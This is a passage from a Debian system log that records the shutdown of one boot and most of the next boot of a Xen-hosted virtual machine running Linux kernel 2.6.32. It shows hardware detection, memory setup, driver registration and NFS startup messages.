1103May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1104May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1105May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1106May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1107May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1108May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1109May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1110May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1111May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1112May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1113May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1114May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1115May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1116May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1117May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1118May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1119May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1120May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1121May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1122May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1123May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1124May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1125May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1126May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1127May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1128May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1129May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1130May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1131May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1132May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1133May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1134May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1135May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1136May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1137May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1138May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1139May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1140May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1141May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1142May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1143May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1144May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1145May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1146May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1147May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1148May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1149May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1150May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1151May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1152May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1153May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1154May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1155May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1156May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1157May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1158May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1159May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1160May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1161May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1162May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1163Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1164Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1165Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1166Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1167Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1168Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1169Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1170Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1171Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1172Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1173Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1174Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1175Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1176Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1177Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1178Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1179Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1180Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1181Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1182Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1183Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1184Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1185Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1186Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1187Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1188Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1189Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1190Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1191Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1192Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1193Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1194Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1195Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1196Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1197Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1198Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1199Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1200Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1201Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1202Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1203Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1204Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1205Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1206Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1207Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1208Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1209Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1210Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1211Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1212Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1213Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1214Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1215Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1216Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1217Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1218Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1219Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1220Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1221Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1222Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1223Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1224Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1225Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1226Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1227Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1228Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1229Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1230Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1231Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1232Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1233Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1234Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1235Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1236Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1237Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1238Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1239Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1240Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1241Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1242Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1243Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1244Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1245Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1246Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1247Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1248Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1249Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1250Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1251Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1252Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1253Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1254Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1255Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1256Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1257Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1258Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1259Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1260Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1261Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1262Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1263Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1264Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1265Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1266Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1267Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1268Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1269Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1270Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1271Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1272Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1273Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1274Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1275Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1276Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1277Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1278Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1279Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1280Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1281Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1282Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1283Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1284Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1285Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1286Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1287Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1288Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1289Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1290Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1291Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1292Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1293Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1294Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1295Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1296Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1297Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1298Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1299Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1300Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1301Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1302Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1303Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1304Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1305Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1306Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1307Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1308Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1309Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1310Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1311Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1312Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1313Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1314Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1315Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1316Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1317Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1318Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1319Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1320Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1321Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1322Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1323Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1324Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1325Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1326Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1327Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1328Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1329Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1330Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1331Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1332Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1333Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1334Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1335Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1336Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1337Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1338Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1339Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1340Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1341Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1342Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1343Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1344Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1345Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1346Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1347Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1348Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1349Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1350Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1351Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1352Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1353Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1354Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1355Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1356Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1357Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1358Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1359Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1360Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1361Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1362Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1363Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1364Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1365Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1366Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1367Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1368Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1369Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1370Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1371Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1372Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1373Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1374Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1375Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1376Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1377Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1378Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1379Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1380Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1381Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1382Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1383Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1384Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1385Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1386Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1387Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1388Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
